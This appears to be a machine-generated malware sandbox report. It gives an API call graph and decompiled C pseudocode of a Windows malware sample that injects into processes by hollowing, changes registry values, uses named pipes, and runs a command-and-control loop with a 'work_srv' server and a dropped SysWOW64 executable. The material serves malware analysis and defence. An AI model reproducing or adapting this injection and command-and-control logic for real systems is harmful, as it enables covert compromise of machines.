GetStartupInfoW 7262->7266 7263 25115ff CreateProcessWithLogonW 7264 25116bf GetLastError 7263->7264 7265 251163f WaitForSingleObject 7263->7265 7264->7269 7265->7266 7267 2511659 CloseHandle 7265->7267 7266->7261 7266->7262 7266->7263 7268 2511668 CloseHandle 7266->7268 7266->7269 7267->7266 7268->7266 7269->7245 7271 251100d LoadLibraryA 7270->7271 7287 2511023 7270->7287 7272 2511021 7271->7272 7271->7287 7272->7248 7273 25110b5 GetProcAddress 7274 25110d1 GetProcAddress 7273->7274 7275 251127b 7273->7275 7274->7275 7276 25110f0 GetProcAddress 7274->7276 7275->7248 7276->7275 7277 2511110 GetProcAddress 7276->7277 7277->7275 7278 2511130 GetProcAddress 7277->7278 7278->7275 7279 251114f GetProcAddress 7278->7279 7279->7275 7280 251116f GetProcAddress 7279->7280 7280->7275 7281 251118f GetProcAddress 7280->7281 7281->7275 7282 25111ae GetProcAddress 7281->7282 7282->7275 7283 25111ce GetProcAddress 7282->7283 7283->7275 7284 25111ee GetProcAddress 7283->7284 7284->7275 7285 2511209 GetProcAddress 7284->7285 7285->7275 7286 2511225 GetProcAddress 7285->7286 7286->7275 7288 2511241 GetProcAddress 7286->7288 7287->7273 7290 25110ae 7287->7290 7288->7275 7289 251125c GetProcAddress 7288->7289 7289->7275 7290->7248 7292 251908d 7291->7292 7293 25190e2 wsprintfA 7292->7293 7294 251ee2a 7293->7294 7295 25190fd CreateFileA 7294->7295 7296 251911a lstrlenA WriteFile CloseHandle 7295->7296 7297 251913f 7295->7297 7296->7297 7297->6645 7297->6646 7299 251ee2a 7298->7299 7300 2519794 CreateProcessA 7299->7300 7301 25197c2 7300->7301 7302 25197bb 7300->7302 7303 25197d4 GetThreadContext 7301->7303 7302->6657 7304 2519801 7303->7304 7305 25197f5 7303->7305 7312 251637c 7304->7312 7306 25197f6 TerminateProcess 7305->7306 7306->7302 7308 2519816 7308->7306 7309 251981e WriteProcessMemory 7308->7309 7309->7305 7310 251983b SetThreadContext 7309->7310 7310->7305 7311 2519858 ResumeThread 7310->7311 7311->7302 7313 2516386 7312->7313 7314 251638a GetModuleHandleA VirtualAlloc 
7312->7314 7313->7308 7315 25163f5 7314->7315 7316 25163b6 7314->7316 7315->7308 7317 25163be VirtualAllocEx 7316->7317 7317->7315 7318 25163d6 7317->7318 7319 25163df WriteProcessMemory 7318->7319 7319->7315 7321 2518791 7320->7321 7322 251879f 7320->7322 7323 251f04e 4 API calls 7321->7323 7324 25187bc 7322->7324 7325 251f04e 4 API calls 7322->7325 7323->7322 7326 251e819 11 API calls 7324->7326 7325->7324 7327 25187d7 7326->7327 7339 2518803 7327->7339 7466 25126b2 gethostbyaddr 7327->7466 7330 25187eb 7331 251e8a1 30 API calls 7330->7331 7330->7339 7331->7339 7334 251e819 11 API calls 7334->7339 7335 25188a0 Sleep 7335->7339 7336 251f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 7336->7339 7338 25126b2 2 API calls 7338->7339 7339->7334 7339->7335 7339->7336 7339->7338 7340 251e8a1 30 API calls 7339->7340 7371 251c4d6 7339->7371 7374 251c4e2 7339->7374 7377 2512011 7339->7377 7412 2518328 7339->7412 7340->7339 7342 2514084 7341->7342 7343 251407d 7341->7343 7344 2513ecd 6 API calls 7342->7344 7345 251408f 7344->7345 7346 2514000 3 API calls 7345->7346 7347 2514095 7346->7347 7348 2514130 7347->7348 7349 25140c0 7347->7349 7350 2513ecd 6 API calls 7348->7350 7354 2513f18 4 API calls 7349->7354 7351 2514159 CreateNamedPipeA 7350->7351 7352 2514167 Sleep 7351->7352 7353 2514188 ConnectNamedPipe 7351->7353 7352->7348 7356 2514176 CloseHandle 7352->7356 7355 2514195 GetLastError 7353->7355 7367 25141ab 7353->7367 7357 25140da 7354->7357 7358 251425e DisconnectNamedPipe 7355->7358 7355->7367 7356->7353 7359 2513f8c 4 API calls 7357->7359 7358->7353 7360 25140ec 7359->7360 7361 2514127 CloseHandle 7360->7361 7362 2514101 7360->7362 7361->7348 7364 2513f18 4 API calls 7362->7364 7363 2513f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 7363->7367 7365 251411c ExitProcess 7364->7365 7366 2513f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 7366->7367 7367->7353 7367->7358 7367->7363 7367->7366 7368 251426a 
CloseHandle CloseHandle 7367->7368 7369 251e318 23 API calls 7368->7369 7370 251427b 7369->7370 7370->7370 7471 251c2dc 7371->7471 7375 251c2dc 135 API calls 7374->7375 7376 251c4ec 7375->7376 7376->7339 7378 2512020 7377->7378 7379 251202e 7377->7379 7380 251f04e 4 API calls 7378->7380 7381 251204b 7379->7381 7383 251f04e 4 API calls 7379->7383 7380->7379 7382 251206e GetTickCount 7381->7382 7384 251f04e 4 API calls 7381->7384 7385 25120db GetTickCount 7382->7385 7394 2512090 7382->7394 7383->7381 7387 2512068 7384->7387 7386 2512132 GetTickCount GetTickCount 7385->7386 7396 25120e7 7385->7396 7390 251f04e 4 API calls 7386->7390 7387->7382 7388 25120d4 GetTickCount 7388->7385 7389 251212b GetTickCount 7389->7386 7392 2512159 7390->7392 7391 2512684 2 API calls 7391->7394 7395 251e854 13 API calls 7392->7395 7405 25121b4 7392->7405 7394->7388 7394->7391 7403 25120ce 7394->7403 7801 2511978 7394->7801 7398 251218e 7395->7398 7396->7389 7402 2511978 15 API calls 7396->7402 7407 2512125 7396->7407 7791 2512ef8 7396->7791 7397 251f04e 4 API calls 7400 25121d1 7397->7400 7401 251e819 11 API calls 7398->7401 7404 251ea84 30 API calls 7400->7404 7410 25121f2 7400->7410 7406 251219c 7401->7406 7402->7396 7403->7388 7408 25121ec 7404->7408 7405->7397 7406->7405 7806 2511c5f 7406->7806 7407->7389 7409 251f04e 4 API calls 7408->7409 7409->7410 7410->7339 7413 2517dd6 6 API calls 7412->7413 7414 251833c 7413->7414 7415 2516ec3 2 API calls 7414->7415 7442 2518340 7414->7442 7416 251834f 7415->7416 7417 251835c 7416->7417 7421 251846b 7416->7421 7418 25173ff 17 API calls 7417->7418 7443 2518373 7418->7443 7419 25185df 7422 2518626 GetTempPathA 7419->7422 7433 2518768 7419->7433 7438 2518671 7419->7438 7420 251675c 21 API calls 7420->7419 7423 25184a7 RegOpenKeyExA 7421->7423 7448 2518450 7421->7448 7434 2518638 7422->7434 7425 25184c0 RegQueryValueExA 7423->7425 7426 251852f 7423->7426 7428 2518521 RegCloseKey 7425->7428 7429 25184dd 7425->7429 7431 2518564 RegOpenKeyExA 
7426->7431 7436 25185a5 7426->7436 7427 25186ad 7430 2518762 7427->7430 7432 2517e2f 6 API calls 7427->7432 7428->7426 7429->7428 7439 251ebcc 4 API calls 7429->7439 7430->7433 7435 2518573 RegSetValueExA RegCloseKey 7431->7435 7431->7436 7437 25186bb 7432->7437 7441 251ec2e codecvt 4 API calls 7433->7441 7433->7442 7434->7438 7435->7436 7436->7448 7451 251ec2e codecvt 4 API calls 7436->7451 7440 251875b DeleteFileA 7437->7440 7452 25186e0 lstrcpyA lstrlenA 7437->7452 7878 2516ba7 IsBadCodePtr 7438->7878 7445 25184f0 7439->7445 7440->7430 7441->7442 7442->7339 7443->7442 7446 25183ea RegOpenKeyExA 7443->7446 7443->7448 7445->7428 7447 25184f8 RegQueryValueExA 7445->7447 7446->7448 7449 25183fd RegQueryValueExA 7446->7449 7447->7428 7450 2518515 7447->7450 7448->7419 7448->7420 7453 251842d RegSetValueExA 7449->7453 7454 251841e 7449->7454 7455 251ec2e codecvt 4 API calls 7450->7455 7451->7448 7456 2517fcf 64 API calls 7452->7456 7457 2518447 RegCloseKey 7453->7457 7454->7453 7454->7457 7458 251851d 7455->7458 7459 2518719 CreateProcessA 7456->7459 7457->7448 7458->7428 7460 251873d CloseHandle CloseHandle 7459->7460 7461 251874f 7459->7461 7460->7433 7462 2517ee6 64 API calls 7461->7462 7463 2518754 7462->7463 7464 2517ead 6 API calls 7463->7464 7465 251875a 7464->7465 7465->7440 7467 25126fb 7466->7467 7468 25126cd 7466->7468 7467->7330 7469 25126e1 inet_ntoa 7468->7469 7470 25126de 7468->7470 7469->7470 7470->7330 7486 251a4c7 GetTickCount 7471->7486 7474 251c47a 7479 251c4d2 7474->7479 7480 251c4ab InterlockedIncrement CreateThread 7474->7480 7475 251c300 GetTickCount 7477 251c337 7475->7477 7476 251c326 7476->7477 7478 251c32b GetTickCount 7476->7478 7477->7474 7481 251c363 GetTickCount 7477->7481 7478->7477 7479->7339 7480->7479 7482 251c4cb CloseHandle 7480->7482 7491 251b535 7480->7491 7481->7474 7483 251c373 7481->7483 7482->7479 7484 251c378 GetTickCount 7483->7484 7485 251c37f 7483->7485 7484->7485 7485->7474 7487 251a4f7 InterlockedExchange 7486->7487 
C-Code - Quality: 88%
E0251C913() {
	CHAR* _v8;
	CHAR* _v12;
	intOrPtr _v16;
	signed int _v17;
	signed int _v24;
	signed int _v35;
	CHAR* _v39;
	signed int _v52;
	long _v56;
	CHAR* _v60;
	CHAR* _v64;
	CHAR* _v68;
	signed int _v72;
	signed int _v76;
	char _v92;
	char _v96;
	long _v100;
	intOrPtr _v104;
	struct _PROCESS_INFORMATION _v120;
	char _v408;
	struct _PROCESS_INFORMATION _v424;
	char _v440;
	intOrPtr _v492;
	intOrPtr _v496;
	intOrPtr _v500;
	intOrPtr _v508;
	intOrPtr _v512;
	char _v640;
	intOrPtr _v688;
	intOrPtr _v720;
	intOrPtr _v728;
	intOrPtr _v732;
	CHAR* _v736;
	char _v740;
	struct _STARTUPINFOA _v808;
	struct _STARTUPINFOA _v876;
	char _v1176;
	void* __ebp;
	intOrPtr _t362;
	intOrPtr _t368;
	void* _t369;
	signed int _t388;
	signed int _t392;
	signed int _t395;
	signed int _t398;
	CHAR* _t403;
	signed int _t408;
	signed int _t409;
	signed int _t410;
	signed int _t413;
	signed int _t416;
	void* _t417;
	CHAR* _t418;
	signed int _t421;
	CHAR* _t428;
	signed int _t429;
	signed int _t434;
	signed int _t438;
	signed int _t439;
	signed int _t441;
	CHAR* _t444;
	signed int _t449;
	signed int _t453;
	signed int _t456;
	signed int _t459;
	signed int _t462;
	signed int _t463;
	signed int _t467;
	signed int _t472;
	signed int _t473;
	signed int _t476;
	signed int _t478;
	signed int _t479;
	CHAR* _t480;
	CHAR* _t483;
	signed int _t485;
	signed int _t488;
	signed int _t489;
	CHAR* _t492;
	long _t494;
	signed int _t499;
	signed int _t500;
	signed int _t501;
	signed char* _t502;
	intOrPtr* _t513;
	signed int _t514;
	signed int _t527;
	signed int _t541;
	signed int _t545;
	signed int _t552;
	intOrPtr* _t559;
	signed int _t560;
	signed int _t571;
	signed int _t575;
	signed int _t579;
	signed int _t583;
	signed int _t588;
	signed char _t590;
	signed int _t591;
	intOrPtr* _t595;
	signed int _t596;
	signed int _t599;
	void* _t602;
	intOrPtr* _t607;
	signed char* _t609;
	CHAR* _t613;
	intOrPtr _t615;
	signed int _t616;
	signed int _t617;
	signed int _t618;
	signed int _t621;
	signed int _t624;
	CHAR* _t630;
	void* _t632;
	signed int _t634;
	CHAR* _t635;
	CHAR* _t636;
	void* _t642;
	signed int _t644;
	void* _t651;
	int _t657;
	int _t673;
	signed int _t681;
	CHAR* _t686;
	intOrPtr _t688;
	void* _t695;
	CHAR* _t701;
	signed int _t705;
	signed int _t709;
	signed int _t711;
	signed int _t712;
	signed int _t723;
	signed char* _t726;
	char _t733;
	char _t734;
	char* _t736;
	void* _t738;
	signed int _t747;
	signed int _t748;
	signed int _t758;
	signed int _t760;
	void* _t763;
	signed int _t764;
	signed int _t765;
	void* _t766;
	void* _t768;
	void* _t769;
	long _t770;
	void* _t773;
	void* _t774;
	void* _t775;
	intOrPtr* _t776;
	intOrPtr* _t777;
	void* _t779;
	void* _t781;
	void* _t782;
	signed int _t789;
	signed int _t791;
	signed int _t793;
	signed int _t795;
	CHAR* _t796;
	signed char* _t797;
	signed int* _t798;
	signed int _t801;
	long _t803;
	signed int _t805;
	void* _t806;
                                                                                                                                  				void* _t807;
                                                                                                                                  				void* _t808;
                                                                                                                                  				void* _t809;
                                                                                                                                  				void* _t811;
                                                                                                                                  				intOrPtr _t819;
                                                                                                                                  				signed int _t820;
                                                                                                                                  				intOrPtr _t821;
                                                                                                                                  				signed int _t822;
                                                                                                                                  				CHAR* _t823;
                                                                                                                                  
                                                                                                                                  				_v64 = 0;
                                                                                                                                  				_v68 = 0;
                                                                                                                                  				_t819 =  *0x252366c; // 0x2522058
                                                                                                                                  				if(_t819 == 0) {
                                                                                                                                  					L2:
                                                                                                                                  					E0251C517();
                                                                                                                                  					L3:
                                                                                                                                  					_t821 =  *0x252366c; // 0x2522058
                                                                                                                                  					if(_t821 == 0) {
                                                                                                                                  						L21:
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						return 0;
                                                                                                                                  					}
                                                                                                                                  					_t822 =  *0x2523670; // 0x2
                                                                                                                                  					if(_t822 == 0) {
                                                                                                                                  						goto L21;
                                                                                                                                  					}
                                                                                                                                  					 *0x2522104 = E0251E819(1, "time_cfg", "wtm_c", 0x14);
                                                                                                                                  					 *0x252210c = E0251E819(1, "time_cfg", "wtm_w", 0x28);
                                                                                                                                  					_t362 = E0251E819(1, "time_cfg", "wtm_r", 0x28);
                                                                                                                                  					_t808 = _t807 + 0x30;
                                                                                                                                  					 *0x2522108 = _t362;
                                                                                                                                  					_t823 =  *0x25236b0; // 0x4200000
                                                                                                                                  					if(_t823 != 0) {
                                                                                                                                  						L7:
                                                                                                                                  						_t747 =  *0x2523674; // 0x0
                                                                                                                                  						_t688 =  *0x252366c; // 0x2522058
                                                                                                                                  						_v12 = 0;
                                                                                                                                  						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
                                                                                                                                  							L11:
                                                                                                                                  							_t748 = _t747 * 0x45;
                                                                                                                                  							_t365 = _t748 + _t688;
                                                                                                                                  							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
                                                                                                                                  							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  							_t368 = E0251F428(E02512684(_t365 + 1), _t689);
                                                                                                                                  							_v16 = _t368;
                                                                                                                                  							_t829 = _t368;
                                                                                                                                  							if(_t368 > 0) {
                                                                                                                                  								_t369 = E0251F43E(_t368,  &_v640, 0xc8, 0); // executed
                                                                                                                                  								_t809 = _t808 + 0x10;
                                                                                                                                  								__eflags = _t369 - 0xc8;
                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                  									E02518F53( &_v640, 0xc8);
                                                                                                                                  									__eflags = _v500 - 0xff;
                                                                                                                                  									_pop(_t695);
                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                  										goto L15;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v512 - 7;
                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                  										goto L15;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v508 - 7;
                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                  										goto L15;
                                                                                                                                  									}
                                                                                                                                  									 *0x2523684 = 1;
                                                                                                                                  									 *0x2523678 = 0;
                                                                                                                                  									 *0x252367c = 0;
                                                                                                                                  									E0251EA84(1, "localcfg", "ip", _v496);
                                                                                                                                  									_v104 = E0251F04E(0);
                                                                                                                                  									_v100 = _t748;
                                                                                                                                  									E0251EA84(1, "localcfg", "srv_time", _v492);
                                                                                                                                  									E0251EA84(1, "localcfg", "local_time", _v104);
                                                                                                                                  									E02518FB6( &_v440,  &_v640);
                                                                                                                                  									E02518FB6( &_v92,  &_v640);
                                                                                                                                  									E0251EE2A(_t695,  &_v740, 0, 0x64);
                                                                                                                                  									_v728 = 1;
                                                                                                                                  									_v688 = 0x100007f;
                                                                                                                                  									_v732 = 1;
                                                                                                                                  									_v720 = 0x1f;
                                                                                                                                  									_v736 = 0;
                                                                                                                                  									_v39 = 0x37;
                                                                                                                                  									_t388 = E0251C65C(_v16,  &_v640,  &_v92, 0x2522118, 0x64,  &_v52);
                                                                                                                                  									_t811 = _t809 + 0x68;
                                                                                                                                  									__eflags = _t388;
                                                                                                                                  									if(_t388 > 0) {
                                                                                                                                  										 *0x2522148 = 0;
                                                                                                                                  										 *0x252215a = 0;
                                                                                                                                  										while(1) {
                                                                                                                                  											L24:
                                                                                                                                  											_t757 = _v16;
                                                                                                                                  											_t392 = E0251C75D(_v16,  &_v640,  &_v440,  *0x25236b0, 0x100000,  &_v52);
                                                                                                                                  											_t811 = _t811 + 0x18;
                                                                                                                                  											__eflags = _t392 - 0xfffffffe;
                                                                                                                                  											if(_t392 == 0xfffffffe) {
                                                                                                                                  												break;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t392;
                                                                                                                                  											if(_t392 < 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											_t395 = _v39;
                                                                                                                                  											__eflags = _t395;
                                                                                                                                  											if(_t395 == 0) {
                                                                                                                                  												_t789 = 1;
                                                                                                                                  												__eflags = 1;
                                                                                                                                  												do {
                                                                                                                                  													_t398 = 1 << _t789;
                                                                                                                                  													__eflags = _v35 & _t398;
                                                                                                                                  													if((_v35 & _t398) != 0) {
                                                                                                                                  														__eflags =  *(_t789 + 0x252215c);
                                                                                                                                  														if( *(_t789 + 0x252215c) == 0) {
                                                                                                                                  															__eflags = _t789 - 3;
                                                                                                                                  															if(_t789 != 3) {
                                                                                                                                  																E0251F1ED(_t789,  &_v96, 0xa);
                                                                                                                                  																E0251E654(E02518C51, 5,  &_v96);
                                                                                                                                  																_t811 = _t811 + 0x18;
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  													_t789 = _t789 + 1;
                                                                                                                                  													__eflags = _t789 - 0x20;
                                                                                                                                  												} while (_t789 < 0x20);
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t395 - 1;
                                                                                                                                  											if(_t395 == 1) {
                                                                                                                                  												_t403 =  *0x25236b0; // 0x4200000
                                                                                                                                  												_t697 =  *_t403;
                                                                                                                                  												_v24 = _t697;
                                                                                                                                  												_t748 = _t403[4];
                                                                                                                                  												_v76 = _t748;
                                                                                                                                  												__eflags = _t697 & 0x00000018;
                                                                                                                                  												if((_t697 & 0x00000018) == 0) {
                                                                                                                                  													L177:
                                                                                                                                  													__eflags = _v24 & 0x00000001;
                                                                                                                                  													if((_v24 & 0x00000001) == 0) {
                                                                                                                                  														L179:
                                                                                                                                  														__eflags = _v24 & 0x00000004;
                                                                                                                                  														if((_v24 & 0x00000004) == 0) {
                                                                                                                                  															L182:
                                                                                                                                  															__eflags = _v24 & 0x00000040;
                                                                                                                                  															if((_v24 & 0x00000040) == 0) {
                                                                                                                                  																L186:
                                                                                                                                  																__eflags = _v24 & 0x00000080;
                                                                                                                                  																if((_v24 & 0x00000080) == 0) {
                                                                                                                                  																	L199:
                                                                                                                                  																	__eflags = _v24 & 0x00000100;
                                                                                                                                  																	if((_v24 & 0x00000100) == 0) {
                                                                                                                                  																		L204:
                                                                                                                                  																		__eflags = _v24 & 0x00000400;
                                                                                                                                  																		if((_v24 & 0x00000400) == 0) {
                                                                                                                                  																			L215:
                                                                                                                                  																			_v8 = 0;
                                                                                                                                  																			while(1) {
                                                                                                                                  																				__eflags = _v64;
                                                                                                                                  																				if(_v64 != 0) {
                                                                                                                                  																					goto L228;
                                                                                                                                  																				}
                                                                                                                                  																				_t758 = _v8[0x2523300];
                                                                                                                                  																				__eflags = _t758;
                                                                                                                                  																				if(_t758 == 0) {
                                                                                                                                  																					L225:
                                                                                                                                  																					_v8 =  &(_v8[4]);
                                                                                                                                  																					__eflags = _v8 - 0x80;
                                                                                                                                  																					if(_v8 < 0x80) {
                                                                                                                                  																						continue;
                                                                                                                                  																					}
                                                                                                                                  																					__eflags = _v64;
                                                                                                                                  																					if(_v64 != 0) {
                                                                                                                                  																						goto L228;
                                                                                                                                  																					}
                                _v39 = 0;
                                _t408 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, 0,  &_v52);
                                _t811 = _t811 + 0x18;
                                __eflags = _t408;
                                if(_t408 > 0) {
                                    goto L24;
                                }
                                goto L228;
                            }
                            _t409 =  *(_t758 + 0x4c);
                            __eflags = _t409;
                            if(_t409 == 0) {
                                goto L225;
                            }
                            _t410 =  *_t409( &_v76,  &_v39,  *0x25236b0, 0x100000);
                            while(1) {
                                _t811 = _t811 + 0x10;
                                _v52 = _t410;
                                __eflags = _t410;
                                if(_t410 <= 0) {
                                    break;
                                }
                                _t413 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, _t410,  &_v52);
                                _t811 = _t811 + 0x18;
                                __eflags = _t413;
                                if(_t413 <= 0) {
                                    _v64 = 1;
                                    goto L225;
                                }
                                _t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x25236b0, 0x100000);
                            }
                            goto L225;
                        }
                        break;
                    }
                    _t416 = E02517DD6(_t748);
                    __eflags = _t416;
                    if(_t416 != 0) {
                        goto L215;
                    }
                    _t417 = E0251F04E(0);
                    __eflags =  *0x25236ac - _t748; // 0x0
                    if(__eflags > 0) {
                        goto L215;
                    }
                    if(__eflags < 0) {
                        L209:
                        __eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
                        if(__eflags == 0) {
                            goto L215;
                        }
                        __eflags =  *0x25221a4; // 0x47a00
                        if(__eflags != 0) {
                            L214:
                            _t418 =  *0x25236b0; // 0x4200000
                             *_t418 = 0;
                            _t733 =  *0x25221a4; // 0x47a00
                            _t418[4] = _t733;
                            _t734 =  *0x25222d4; // 0x92c105df
                            _t418[8] = _t734;
                            _v39 = 0x34;
                            _t421 = E0251C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
                            _t811 = _t811 + 0x18;
                            __eflags = _t421;
                            if(_t421 <= 0) {
                                break;
                            }
                            goto L215;
                        }
                        _t791 = E0251675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v72, 0);
                        _t811 = _t811 + 0xc;
                        __eflags = _t791;
                        if(_t791 != 0) {
                             *0x25222d4 = E025124C2(_t791, _v72, 0);
                             *0x25221a4 = _v72;
                            E0251EC2E(_t791);
                            _t811 = _t811 + 0x10;
                        }
                        __eflags =  *0x25221a4; // 0x47a00
                        if(__eflags == 0) {
                            goto L215;
                        } else {
                            goto L214;
                        }
                    }
                    __eflags =  *0x25236a8 - _t417; // 0x0
                    if(__eflags > 0) {
                        goto L215;
                    }
                    goto L209;
                }
                E0251E854(1, "localcfg", "except_info",  *0x25236b0, 0x100000, 0x2520264);
                _t428 =  *0x25236b0; // 0x4200000
                _t811 = _t811 + 0x18;
                _t304 =  &(_t428[1]); // 0x4200001
                _t736 = _t304;
                do {
                    _t748 =  *_t428;
                    _t428 =  &(_t428[1]);
                    __eflags = _t748;
                } while (_t748 != 0);
                _t429 = _t428 - _t736;
                _v12 = _t429;
                __eflags = _t429;
                if(_t429 <= 0) {
                    goto L204;
                }
                E0251E8A1(_t748, 1, "localcfg", "except_info", 0x2520264);
                _v39 = 0xf;
                _t434 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, _v12,  &_v52);
                _t811 = _t811 + 0x28;
                __eflags = _t434;
                if(_t434 <= 0) {
                    break;
                }
                goto L204;
            }
            _t760 = 0;
            __eflags =  *0x2522184; // 0x0
            if(__eflags != 0) {
                E02516F5F( &_v408, 0x120);
                _t449 =  *0x2522130; // 0x210
                _push(0x2522184);
                asm("sbb eax, eax");
                _push( &_v408);
                _t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
                __eflags = _t453;
                _push(_t453);
                _push( *0x2522159 & 0x000000ff);
                _push( *0x2522134);
                _push( *0x2522120);
                _t456 = wsprintfA( *0x25236b0, E02512544(0x25222f8, 0x2520fa0, 0x27, 0xe4, 0xc8));
                _t811 = _t811 + 0x34;
                _t760 = _t456;
            }
            _t793 =  *0x25222d8; // 0x0
            __eflags = _t793;
            if(_t793 == 0) {
                L193:
                __eflags = _t760;
                if(_t760 == 0) {
                    goto L199;
                }
                _v39 = 0xb;
                _t438 = E0251C65C(_v16,  &_v640,  &_v92,  *0x25236b0, _t760,  &_v52);
                _t811 = _t811 + 0x18;
                __eflags = _t438;
                if(_t438 <= 0) {
                    break;
                }
                __eflags =  *0x2522184; // 0x0
                if(__eflags != 0) {
                     *0x2522184 = 0;
                }
                _t439 =  *0x25222d8; // 0x0
                __eflags = _t439;
                if(_t439 != 0) {
                    E0251EC2E(_t439);
                     *0x25222d8 = 0;
                }
                goto L199;
            } else {
                _t441 = _t793;
                _t293 = _t441 + 1; // 0x1
                _t738 = _t293;
                do {
                    _t748 =  *_t441;
                    _t441 = _t441 + 1;
                    __eflags = _t748;
                } while (_t748 != 0);
                _v60 = _t441 - _t738;
                _t444 =  *0x25236b0; // 0x4200000
                E0251EE08( &(_t444[_t760]), _t793, _t441 - _t738 + 1);
                _t811 = _t811 + 0xc;
                _t760 =  &(_v60[_t760]);
                __eflags = _t760;
                goto L193;
            }
        }
        while(1) {
            _t459 = E0251C06C( &_v24,  &_v39,  *0x25236b0, 0x100000);
            _t811 = _t811 + 0x10;
            __eflags = _t459;
            if(_t459 == 0) {
                goto L186;
            }
            _t462 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, _t459,  &_v52);
            _t811 = _t811 + 0x18;
            __eflags = _t462;
            if(_t462 <= 0) {
                goto L228;
            }
        }
        goto L186;
    }
    _push(0x71c7);
    _push( *0x25236b0);
    _t463 = E0251E7B4();
    __eflags = _t463;
    if(_t463 <= 0) {
        goto L182;
    }
    _v39 = 2;
    _t467 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, _t463 * 0x24,  &_v52);
    _t811 = _t811 + 0x18;
    __eflags = _t467;
    if(_t467 <= 0) {
        break;
    }
    goto L182;
}
E02513A00(_t697,  *0x25236b0);
_v39 = 3;
_t472 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, 0x28,  &_v52);
_t811 = _t811 + 0x1c;
__eflags = _t472;
if(_t472 <= 0) {
                                                                                                                                  														break;
                                                                                                                                  													}
                                                                                                                                  													goto L179;
                                                                                                                                  												}
                                                                                                                                  												_push(_t697);
                                                                                                                                  												_push(0x100000);
                                                                                                                                  												_push(_t403);
                                                                                                                                  												while(1) {
                                                                                                                                  													_t473 = E02513C09(_t748);
                                                                                                                                  													_t811 = _t811 + 0xc;
                                                                                                                                  													__eflags = _t473;
                                                                                                                                  													if(_t473 == 0) {
                                                                                                                                  														goto L177;
                                                                                                                                  													}
                                                                                                                                  													_t697 =  &_v52;
                                                                                                                                  													_v39 = 4;
                                                                                                                                  													_t476 = E0251C65C(_t757,  &_v640,  &_v92,  *0x25236b0, _t473,  &_v52);
                                                                                                                                  													_t811 = _t811 + 0x18;
                                                                                                                                  													__eflags = _t476;
                                                                                                                                  													if(_t476 <= 0) {
                                                                                                                                  														goto L228;
                                                                                                                                  													}
                                                                                                                                  													_t478 = _v24 & 0x00000010;
                                                                                                                                  													__eflags = _t478;
                                                                                                                                  													_push(_t478);
                                                                                                                                  													_push(0x100000);
                                                                                                                                  													_push( *0x25236b0);
                                                                                                                                  												}
                                                                                                                                  												goto L177;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t395 - 2;
                                                                                                                                  											if(_t395 == 2) {
                                                                                                                                  												_t479 = E0251DF4C(_t748,  *0x25236b0);
                                                                                                                                  												__eflags = _t479;
                                                                                                                                  												if(_t479 != 0) {
                                                                                                                                  													_t480 =  *0x25236b0; // 0x4200000
                                                                                                                                  													E0251ED3B( &(_t480[4]), "work_srv", 8);
                                                                                                                                  													_t483 =  *0x25236b0; // 0x4200000
                                                                                                                                  													_t811 = _t811 + 0xc;
                                                                                                                                  													__eflags =  *_t483 - 1;
                                                                                                                                  													if( *_t483 == 1) {
                                                                                                                                  														_t485 = E0251EED1( &(_t483[4]), "work_srv");
                                                                                                                                  														__eflags = _t485;
                                                                                                                                  														if(_t485 == 0) {
                                                                                                                                  															 *0x2523680 = 0;
                                                                                                                                  															 *0x2523674 = 0;
                                                                                                                                  															 *0x2523678 = 0;
                                                                                                                                  															 *0x252367c = 0;
                                                                                                                                  															E0251C517();
                                                                                                                                  															_v68 = 1;
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											__eflags = _t395 - 0xa;
                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                  												E025131D0( *0x25236b0, _v52);
                                                                                                                                  												L46:
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											if(__eflags <= 0) {
                                                                                                                                  												L156:
                                                                                                                                  												_t763 = 0;
                                                                                                                                  												__eflags = 0;
                                                                                                                                  												do {
                                                                                                                                  													_t249 = _t763 + 0x2523300; // 0x0
                                                                                                                                  													_t488 =  *_t249;
                                                                                                                                  													__eflags = _t488;
                                                                                                                                  													if(_t488 == 0) {
                                                                                                                                  														goto L165;
                                                                                                                                  													}
                                                                                                                                  													_t795 =  *(_t488 + 0x40);
                                                                                                                                  													__eflags = _t795;
                                                                                                                                  													if(_t795 == 0) {
                                                                                                                                  														goto L165;
                                                                                                                                  													}
                                                                                                                                  													_t748 = 0;
                                                                                                                                  													_t489 = _t488 + 0xc;
                                                                                                                                  													__eflags = _t489;
                                                                                                                                  													while(1) {
                                                                                                                                  														_t705 =  *_t489;
                                                                                                                                  														__eflags = _t705;
                                                                                                                                  														if(_t705 == 0) {
                                                                                                                                  															goto L165;
                                                                                                                                  														}
